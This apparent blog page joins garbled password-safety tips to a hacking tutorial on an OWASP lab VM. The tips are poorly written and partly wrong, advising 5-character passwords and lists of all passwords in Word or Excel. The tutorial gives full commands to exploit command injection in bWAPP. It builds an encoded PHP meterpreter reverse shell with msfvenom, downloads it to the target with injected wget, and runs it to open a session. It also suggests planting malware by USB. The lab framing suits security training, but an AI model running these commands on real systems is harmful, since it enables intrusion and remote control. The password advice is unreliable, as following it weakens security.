      1. When creating a password, you should enter mix information like in your credit card, bank account or any assume a name that is extraordinary.


      2. A second good advice is to use alphanumeric, a combination of numbers and letters even mix with symbols. For a higher security, at least two letters that you enter should be in uppercase.


      3. Creating a password should be hard or rare to be guess wherein other programs and even other people can't quickly discover.


      4. A word should not an existing name regardless of any language used.


      5. Don't use your initial names, date of your birth and other common words because it can be easily guessed.


      6. Don't use other older accounts.


      7. The password to enter should be 5-digit or more for additional security.


      8. Do not try to use usual passwords.


      9. Having two or more accounts for your email, you must use another password. Be sure that you will memorize your entire password to avoid failures.


      10. The last but not the least tip is that try to have a list base on your common used programs like notes, excel or word to all your websites, mail boxes or either through your subscriptions and mail back to its right place or location. Your password and username use should be neat and properly organize so that you can immediately use it.


      After making a virtual password into your account, should also take consider on how to secure your valuable website against from accidental attacks and cruel hackers. The following are the pointers to consider:

       

      Protect Yourself



      1. Install a virus protection on your software to have a complete safeguarding on your website.


      2. Modify and transform your password always by selecting alphanumeric words. To avoid committing of failures, be sure that you have a list for every password and username that you made.


      3. Keep updating on your use safety measure patches to avid harmful viruses that might enter in your systems like Trojans.


      4. Connect to Google webmaster wherein it will help or assist you to learn on different hacking endeavors.


      5. Lastly, you should always have back-ups to restore the date you save.


      After reading the entire article, make sure that you follow those helpful tips so that you can be ready and alert always for any hacking attempts. 

      It's up to you if you follow it or not, but it assures you to have a maximum protection for your software, network and even your invested website. 

      If you're top priority is to stay away from hackers who do hacking passwords, then you should bear in mind and take into action those easy and simple tips above.

      All about hacking and cyber security I present ways of hacking over all platforms also trending news & info bugbounty tutorial for penetration testers

       Let us actually get started with some of our first exploitations. So what you want to do is open up your msfconsole, first of all open up our OWASP virtual machine as well. So for me it is already up and running. If it is not for you, you want to open it. And let's go open up our Firefox for a moment. Now what we will be doing in this tutorial is basically I will show you how you can get the meterpreter shell back with the command injection attack.


       I will also show you how to do the same thing with the PHP injection vulnerability. Now we didn't cover PHP code injection but it is simple, and it is almost the same as the other injections that we did before. So it is just injecting a certain type of code and injecting it into a browser that isn't very well filtered. So the user input is also read as a code. 

      So let us, first of all, go to the OWASP virtual machine. So my Ip is 192.168.56.11 It will open up our standard OWASP virtual machine welcome page, where we have all of our stuff that we need. we want to go to the bWAPP right here. Now the login is the same as before, so bee and then bug right here in order to log in.  Press enter, and you are logged into BWAPP. then choose os command injection



      So we will use burpsuite as well with the mixture of Metasploit, and with the mixture of the OWASP virtual machine. So we will be able to inspect packets in burp suite, and we will be sending some of the other stuff into the website, such as our meterpreter shell, and such as some of the other commands.  

      So before we do any of that, just go to the proxy intercept and turn the intercept off so we can load the pages properly. Now when we go to the page and we reloaded once again, we successfully connect to it. And here what we  chose is the OS command injection. 

      And right here we are performing the DNS lookup. So let's see what happens when we just run this with the default server right here. We can see a server and then this IP address, so this basically the router, and then we have some of the other options as well. So the IP address at the end is this one, it doesn't even matter. So what matters for us is what happens if we run that. And then after that, we also specify ls, which is the command to list all of the directories and files in that sub directory. So we click here ls, and just as simple as that we can now see that this website is vulnerable to the command injection. 
      os command injecion


      It also specified all of the files that it has in that directory on its machine, which it shouldn't be specifying. So now that we know that, what we want to do next is basically we want to make a meterpreter shell that is basically running over PHP. 
      Now, why over PHP? 
      As we can see right here all these files are in .PHP, and we can actually upload the shell on this web server, and run it, make the web server connect to our virtual machine. So let us do that by starting off with creating the meterpreter PHP shell. 

      So this is where we introduce, for the first time, the msfvenom tool, which we will use in order to create the meterpreter shell. So we need to leave this and let's open a new terminal. 

      msfvenom

       and then after that, basically, if you want to you can just type --help. I believe it will print the available options, but let's not bother with this at the moment. Just follow with what I'm typing and I will explain while I'm going through it.

      #msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -e php/base64 -f raw > shell.php

       So msfvenom... now -p option will actually after that specify the payload that you will use. So we want to use PHP meterpreter and then reverse TCP. So php/meterpreter/reverse_tcp. 

      Reverse TCP working

       I made a simple illustration of what our reverse TCP shell means. So we have our PC right here which is the attacker's PC. This is our good old Kali Linux machine that's for the attacker. And here we have the victim machine which we are attacking. So we want to send the shell to the victim machine. This is in our case the OWASP virtual machine, 

      So the problem with connecting, just simply connecting to the open port, is that this machine might have a firewall around it. Not might, basically all of the machines. All of the networks nowadays have firewalls, but what firewall cannot prevent is the victim machine connecting back to us. 

      Now how will we do that? 

      What we want to do is we want to send the file to this machine right here. The file, so shell.php is that file and we sent it to the victim machine, and what that file would do is basically it will initiate the connection with us. 
      So this file when it is run on the victim machine, or when it is started up on the machine, it will try to connect to us. So the firewall won't be able to stop it since the victim machine itself tried to connect to us. And while it tries to connect to us we will be listening for the outgoing or incoming connections. And once this program is started it will connect back to us, and we will be able to communicate with this machine and execute commands in it, and so on and so on. 

      But you might be asking, how are we going to get that file on the victim machine? 

      Well, that is simple. If the victim machine is vulnerable to the PHP code injection or to the OS command injection, we will be able to execute it just by making the machine download it with command injection. 

      But if, for example, the machine isn't vulnerable to anything, which we will cover in the later articles when the machine doesn't have any vulnerability, the only way for the victim to download that file is if it clicks on the download button and if it runs it itself. We will not be able to run the file for the victim itself. Or, there is another way. If the victim is physically close to you, you can actually take your USB drive, transfer the file onto the USB drive, and transfer to the victim machine while they are not looking, or something like that, and then run the file. And basically, you just did all of this process by yourself, just being physically on their laptop or on their PC. 

      So, I hope you understood this. So, the basic idea behind this is that the victim is trying to connect back to us with our malware program, or with our PHP meterpreter shell. 

      So let us continue now with actually making this. Now the name of that shell is meterpreter. We will use it with PHP and we use the reverse TCP connection. Now there are some of the other options as well but we will use these ones for now. 

      Now after you specify all of this, the next thing we want to specify is the localhost IP address. Now, what is the localhost IP address? That is the IP address of the host that's listening. Which in this case the host that is listening is you. So you as an attacker are the listening host. So, what we need to specify right here after the LHOST, then equals and then the IP address. So let me just check what the IP address is from this machine. So ifconfig... And then we specify 10.0.2.15 

      And after that, we need to specify the out port as well, and that is the port that you are listening to. It is also your port. So, by default Metasploit is set on the 4444 port, so we will just keep with that. So just 4444, select that, and after that, you can select some of the other options that are actually optional. 

      So, we will select that so I can just show you. For example, let's use the encoder. Now the encoder...I covered what an encoder is in the previous article. So basically it's used to most likely bypass antiviruses, which actually we do not need in this case but I will show you how you can use it. So the encoder will scramble the code, we will not be able to see the code itself in raw format. We will be seeing scrambled, encrypted code. So the encoder that I will use is php/base64. 

      What else we want to specify at the end is -f, and then file to be raw, and after that, we want to specify this narrow and just save that into shell.php Once we select all of this and once we double-check all of the options that we set, you can click click here enter, and this will take a few seconds to finish. 

      So, our meterpreter PHP shell is now 1503 bytes large. If you press here ls, you'll be able to see it is right here. So this is our shell.php, this is our malware, and this is our program that we will be send to the victim machine. We created it with this command. Now there are a few things that you need to do when you make the PHP reverse shell. 

      First of all, you need to add the PHP tag. since it doesn't come with that. So, this is the scrambled code. This is basically Base64 encoded code as we can see right here. This is the function that is used to decode the base64. We can see this doesn't look anywhere close to the programming language but that is why we use the encoder, so it doesn't get detected by antivirus on legit websites. So, what we want to do is add the PHP tag. So, first of all, up here we want to add this tag, and then a question mark, and then PHP. So that is the opening tag, and at the end, we want to add the question mark and then the closing tag. You need to add this in order for the program or for the machine to recognize this as the PHP code. So, ctrl + O to save, Ctrl + X to exit. 




      And now we are good to go. The only thing we need to do right now is set this file or program somewhere where it can be downloaded from. Now that place would be the XAMPP Apache 2 web server. So you want to send this to your XAMPP webserver. So let us go to /opt/lampp/htdocs/, which is the location of all the programs that are available on your XAMPP web server, basically whatever path to your shell.php is, and move it to /opt/lampp/htdocs/I made one folder named shell so mine directory is /opt/lampp/htdocs/shell. And we can see that right now we have this shell.php right here. 

       now the next thing we want to do is make sure that XAMPP is running. We can see that is active and running. And right now what we want to do is go to our IP address, which is localhost/shell, 


      and we can see that right here we have available online the shell.php file. Now what we want to do, we want to make that the victim PC actually downloads this file. So how do we do that? Since it is vulnerable to the command injection,  you want to do is use a simple tool that is on all Linux systems, which is called wget. Now, wget is basically used to download the file.  And let's actually go to root and mkdir test, and go to test. Here we do not have anything. But if we run this command wget, and then we run localhost and we need to specify what we are downloading. So we need to specify the /shell.php since that is the name of our file that is located in the www/html folder.
      Which looks like this,
       
      wget  localhost/shell/shell.php
       
       
      We press here enter and this will download the file for us. As we can see it downloaded shell.php just with this simple one command. So if I type here ls once again, we can see that the shell.php is in our folder.  So now if we cat it we can see that we get the entire file right here. 

      Now, this was only the problem with the Apache 2 from my Kali Linux web server. So don't mind this, you should be good to go. And let us continue with the attack. So right now what we want to do is perform the command injection. 
       
      So we know that there is a vulnerable input, and let's actually exploit it right now.
      And let us right now type the same command. So
       
      ;wget localhost/shell/shell.php 
       
      Now try to find if right now it successfully downloaded the shell.php So it should be somewhere around, we successfully got the shell.php file on our target machine with a simple command. And we didn't have to make anyone click on anything, or we didn't have to make basically any physical contact with that machine. Now in order for you to execute this file you will need to type a certain command. But before we type that command, we need to start listening on a certain port. 
       
      So let us open our msfconsole so we can continue with this attack. Right now before we execute the shell.php on the victim, we want to start our listener in our Metasploit framework. So this is opening. What you want to use right here is something called exploit multi/handler. 
       
      So this is something that you will use a lot. Just type here

       use exploit/multi/handler

      Metasploite exploite multi handler

       
       
      If you show options, you can see that there are no options right here. So what you want to do is set the payload, 

      set payload php/meterpreter/reverse_tcp 
       
      and we can see that we get the whole LHOST to listen on. Now double-check the port we specified in that command while we were making shell.php that the LPORT is 4444, and the LHOST is the IP address of our own machine. So we listen to our own connection. So 

      set LHOST 10.0.2.15 
       
      Metasploite exploite multi handler payload

       
       
      And all I need to do is type here exploit right now, and this will wait for an incoming connection. So right now we are waiting for someone to run that program on the target machine. But since nobody will really do it, we have to do it ourselves. And we can do it since that server is vulnerable to the command injection. So just type, and then what we want to do is basically php -f and then shell.php. This command right here will run the PHP file. 
       
      ;php -f shell.php
       
      And we can see if I press here Lookup, we get a meterpreter session 1 opened. We can see right here that it is on a connection from our OWASP virtual machine, or basically, this is a connection from our OWASP virtual machine, which it's IP address, and the IP address of this is our Kali Linux machine. So we successfully got meterpreter open. Now that will be about it for this tutorial. We will cover the other exploits as well, and we will also show what we can do with a meterpreter session open. So what can we execute, what post-exploitation tools can we use, and so on and so on. So that's about it for now. I hope I see you in the next tutorial and take care.